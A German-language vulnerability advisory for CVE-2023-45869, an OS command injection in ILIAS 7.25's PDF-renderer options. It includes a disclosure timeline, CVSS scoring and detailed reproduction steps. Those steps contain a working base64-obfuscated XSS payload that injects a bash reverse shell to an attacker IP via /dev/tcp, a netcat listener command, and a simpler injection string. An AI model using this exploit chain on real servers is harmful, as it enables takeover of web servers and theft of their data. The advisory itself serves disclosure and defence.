CVE-2023-45869: CVE-2023-45869 - Labor - rehme.infosec

Vulnerability

Product

Impact

CVE

OS Command Injection

ILIAS

Kritisch

CVE-2023-45869

Responsible Disclosure

⚑ 25. Sep. 2023 - Die Sicherheitslücke wurde entdeckt.
→ 26. Sep. 2023 - Die Sicherheitslücke wurde an ILIAS gemeldet.
← 29. Sep. 2023 - ILIAS bestätigt den Erhalt des Reports.
← 06. Okt. 2023 - ILIAS bestätigt, dass die Sicherheitslücke geschlossen wurde.
← 23. Okt. 2023 - Patched ILIAS-Release: 8.6, 7.26

1. Allgemeine Beschreibung

Die identifizierte Sicherheitslücke wurde in ILIAS Version7.25 (2023-09-12 Release) entdeckt.

Es handelt sich um eine sogenannte OS Command Injection Sicherheitslücke. Dies ist eine Sicherheitslücke, bei der von einem Angreifer übermittelte Befehle auf Betriebssystem-Ebene ausgeführt werden können. In diesem Fall ermöglicht die Schwachstelle einem Angreifer Kommandozeilen-Befehle auszuführen.

Ein Benutzer mit Administratorrechten kann Einstellungen für den PDF-Renderer konfigurieren. Ein Angreifer hat in dieser Komponente potenziell die Möglichkeit Systembefehle einzuschleusen, welche die reguläre Befehlsausführung erweitert. Aufgrund fehlender Eingabeüberprüfung ist es möglich, die Befehlskette beliebig zu erweitern.

Eine bekannte Sicherheitslücke (CVE-2022-45915) könnte hierzu hilfreich sein, da dieselbe Komponente betroffen ist. Der entscheidende Unterschied ist, dass für die Übermittlung einer Payload nicht der Pfad zur Binary wkhtmltopdf selbst, sondern Eingabefelder der Options-Parameter vulnerabel sind.

Besonders kritisch macht diese Schwachstelle, dass sie unter Umständen als normaler User ausgenutzt werden kann. Unter “normal” verstehen wir einen User Account mit den voreingestellten Rechten einer aufgesetzten ILIAS Instanz.

Der folgende PoC und die abschließende Klassifizierung bilden das Worst-Case-Szenario ab. Der Angriff erfolgt durch einen Account mit User-Rechten.

2. Proof of Concept (PoC)

Your browser does not support the video tag.
Download video? Here.

3. Reproduktion der Schwachstelle****3.1 Reproduktionsschritte (Worst-Case)****Vorabhinweis

Möchten Sie die Schwachstelle nicht mit dem größtmöglichen Impact, sondern auf einfachem Wege als Administrator reproduzieren, überspringen Sie die folgend aufgeführten Schritte und folgen Sie den Anweisungen unter dem Punkt "3.2 Reproduktionsschritte (als Admin)".

Schritt 1:

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Erstellen Sie neben dem gegebenen Administrator einen weiteren User Account:

1. “root” (ein Administrator)
2. “testuser” (ein normaler User, der Angreifer)

Schritt 2:

Aktivieren Sie mit dem Administrator-Account unter Administration > Layout und Navigation > Editor > HTML/Javascript erlauben die Checkbox bei Modules/Portfolio: Portfolioseite.

Schritt 3:

Loggen Sie sich mit dem User Account “testuser” ein.
Navigieren Sie auf Persönlicher Arbeitsraum > Portfolio und erstellen Sie ein Portfolio mit einer leeren Seite. Bearbeiten Sie die leere Seite und erstellen Sie das Inhaltselement Text einfügen.

Kopieren Sie die folgende Payload in einen Texteditor Ihrer Wahl. Ersetzen Sie die im Data-Attribut ( data-ip) gegebene IP 123.456.78.910 mit Ihrer öffentlichen IP (also die IP-Adresse, welche für eine Verbindung zum Webserver verwendet werden soll – z.B. die Ihres PCs).

<img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob(‘dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7’))>

<img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

Kopieren und fügen Sie die geänderte Payload aus Ihrem Editor in das Textelement auf der Webseite ein und speichern Sie abschließend die Änderung über den Button "Speichern und zurückkehren".

Schritt 5:

Führen Sie auf Ihrem PC den folgenden netcat Befehl aus, um über den Port 1234 auf den Verbindungsaufbau mit dem Webserver warten.

nc -nlvp 1234

nc -nlvp 1234

Schritt 6:

Loggen Sie sich als Administrator ein und öffnen Sie entweder die zuvor erstellte Portfolioseite des Users “testuser” über einen Direktlink oder über die Portfoliosuche unter Persönlicher Bereich > Portfolio > Portfolios anderer Benutzer.

Die hinterlegte Payload aus Schritt 3 wird beim Aufruf der Portfolioseite direkt ausgeführt. Überprüfen Sie Ihr CLI:

Der Webserver hat eine Verbindung durch eine Reverse Shell mit dem PC aufgebaut. Als potenzieller Angreifer haben Sie mit den Rechten des User www-data Kontrolle über den Webserver, auf dem ILIAS installiert ist.

Was genau macht die Payload?

Folgender Befehl wird bei einer Ausführung der OS Command Injection über die Funktion exec() in der Methode execQuoted() der Klasse ilUtil (/Services/Utilities/classes/class.ilUtil.php) gänzlich ausgeführt:

/usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 “127.0.0.1” /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c ‘bash -i >/dev/tcp/XXX.XXX.XXX.XXX/1234 0>&1’ # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie “PHPSESSID” “cv06phhvn81aa30gsnku0e6fl5” --cookie “ilClientId” “myilias” /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1

/usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

Um die Payload zu verstehen, hilft die Synopsis von wkhtmltopdf:
wkhtmltopdf [GLOBAL OPTION]… [OBJECT]… <output file>

Der CLI-Befehl beginnend mit wkhtmltopdf erscheint mit allen folgenden [GLOBAL OPTION] Parameter bis zu --javascript-delay wie erwartet normal. Die Payload aus Schritt 3 übergibt ab dieser Stelle den Wert 200 für die voranstehende Option und definiert anschließend direkt das [OBJECT] mit der localhost IP als Quelle (könnte auch eine beliebige URL oder ein existenter Pfad zu einer Datei sein). Folgend wird mit /tmp/x.pdf das <output file> bestimmt, welches durch && rm /tmp/x.pdf direkt wieder gelöscht wird (das Löschen der Datei ist nicht zwingend notwendig). Es folgt die Reverse Shell in der Befehlskette, welche mit der IP des Angreifers über den Port 1234 eine Verbindung aufbaut: && /bin/bash -c ‘bash -i >/dev/tcp/X.X.X.X/1234 0>&1’ . Abschließend werden alle nachfolgenden Zeichen des CLI-Befehls mit # auskommentiert.

3.2 Reproduktionsschritte (als Admin)****Schritt 1:

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Loggen Sie sich als Administrator ein.

Navigieren Sie anschließend auf die Seite Administration -> PDF-Erstellung und klicken Sie unter dem Tab Einstellungen auf den Button Konfiguriere Renderer in der Sektion Portfolio / ContentExport.

Schritt 2:

Kopieren Sie folgende Payload:

200 “127.0.0.1” /tmp/x.pdf && rm /tmp/x.pdf && echo “Payload executed successfully” > /tmp/poc.txt #

200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

Um die erfolgreiche Ausführung einer Injektion simpel überprüfen zu können, wird mit dieser Payload eine Datei “poc.txt” im Verzeichnis “/tmp” auf dem Webserver abgelegt. Siehe Was genau macht die Payload? unter Punkt 3.1 für eine detaillierte Aufschlüsslung technischer Details.

Fügen Sie die kopierte Payload in das Eingabefeld Javascript Verzögerung ein.

Schritt 3:

Führen Sie einen PDF-Export über ein beliebiges Modul aus. Zum Beispiel über Portfolio. Erstellen Sie hierzu ein Portfolio und führen Sie einen PDF-Export aus:

Schritt 4:

Prüfen Sie auf dem Webserver, ob die Payload erfolgreich ausgeführt wurde:

Voraussetzungen für die Ausnutzung

Die Voraussetzungen für den aufgeschlüsselten Worst Case (Punkt 3.1) lauten wie folgt:

• Ein Angreifer benötigt Zugriff auf einen Account mit mindestens den Rechten eines normalen Users.
• Die vom Angreifer hinterlegte Payload muss durch eine User-Interaktion eines hoch priviligierten Nutzers (Administrator) über einen Seitenaufruf ausgelöst werden.
• Die Funktionalität HTML/Javascript erlauben muss für ein beliebiges Modul, für welches ein User Schreibrechte hat, enabled sein.

Sollte die Funktionalität HTML/Javascript erlauben abgeschaltet sein, besteht die Schwachstelle OS Command Injection als solche weiterhin, kann dann aber nur mit Administrationsrechten oder (falls gegeben) durch eine andere XSS Schwachstelle ausgenutzt werden.

Auswirkungen

Diese Schwachstelle kann erhebliche Auswirkungen auf die Sicherheit der betroffenen ILIAS-Installation und des zugrunde liegenden Betriebssystem haben. Alle auf dem Server gespeicherten Daten, Dateien und Komponenten, die der Webserver-User mit gegebenen Rechten lesen, schreiben oder ausführen kann, sind potenziell betroffen. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, könnte zudem das System beschädigen oder weitere Angriffe (z.B. auf externe Dienste wie LDAP durch einsehbare Credentials) durchführen.

Klassifikation

CVSS: 9.0 Critical (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

Attack Vector (AV): N
Es handelt sich um einen Netzwerkangriff. Die verwundbare Komponente ist “aus der Ferne ausnutzbar” und wird als ein Angriff betrachtet, der auf Protokollebene über das Internet stattfindet.

Attack Complexity (AC): L
Besondere Zugangsbedingungen oder mildernde Umstände bestehen nicht. Es MUSS jedoch für eine erfolgreiche Durchführung die Konfiguration “HTML/Javascript erlauben” gesetzt sein. Wenn eine bestimmte Konfiguration für den Erfolg eines Angriffs erforderlich ist, wird die anfällige Komponente nach CVSSv3.1 Spezifikation unter der Annahme bewertet, dass sie sich in dieser Konfiguration befindet.

Privileges Required (PR): L
Der Angreifer benötigt Privilegien, die grundlegende Benutzerfunktionen eines Users bereitstellen.

User Interaction (UI): R
Der platzierte Schadcode muss für einen erfolgreichen Angriff durch eine User-Interaktion eines Administrators ausgeführt werden.

Scope (S): C
Die anfällige Komponente ist die Webanwendung: Die Webanwendung überführt Systembefehle durch Benutzereingaben in eine exec() Funktion. Die betroffene Komponente ist der Webserver: Auf diesen erlangt der Angreifer Zugriff. Es kann sowohl auf das Dateisystem zugegriffen werden, als auch beliebig gespeicherte Daten aus anderen Komponenten (z.B. Datenbanken) extrahiert werden, welche bei normaler Nutzung der Web-Applikation nicht verfügbar sein sollten. Auch können auf dem Server befindliche Programme bzw. Binaries ausgeführt werden.

Confidentiality ©: H
Bei einen erfolgreichen Angriff kommt es zu einem totalen Verlust der Vertraulichkeit. Alle Ressourcen innerhalb der betroffenen Komponente und weiterführend Komponenten des Betriebssystems werden dem Angreifer offengelegt.

Integrity (I): H
Bei einem erfolgreichen Angriff kommt es zu einem totalen Verlust der Integrität. Der Angreifer ist in der Lage, alle geschützten Dateien der betroffenen Komponente und weiterführend Dateien aus Komponenten des Betriebssystems zu verändern.

Availability (A): H
Bei einem erfolgreichen Angriff ist der Angreifer in der Lage, den Zugang zu den Ressourcen der betroffenen Komponente und weiterführend aus Komponenten des Betriebssystems vollständig zu verweigern. Zum Beispiel durch das Löschen von Dateien.

email: [email protected] | threema: WTZ4BZN9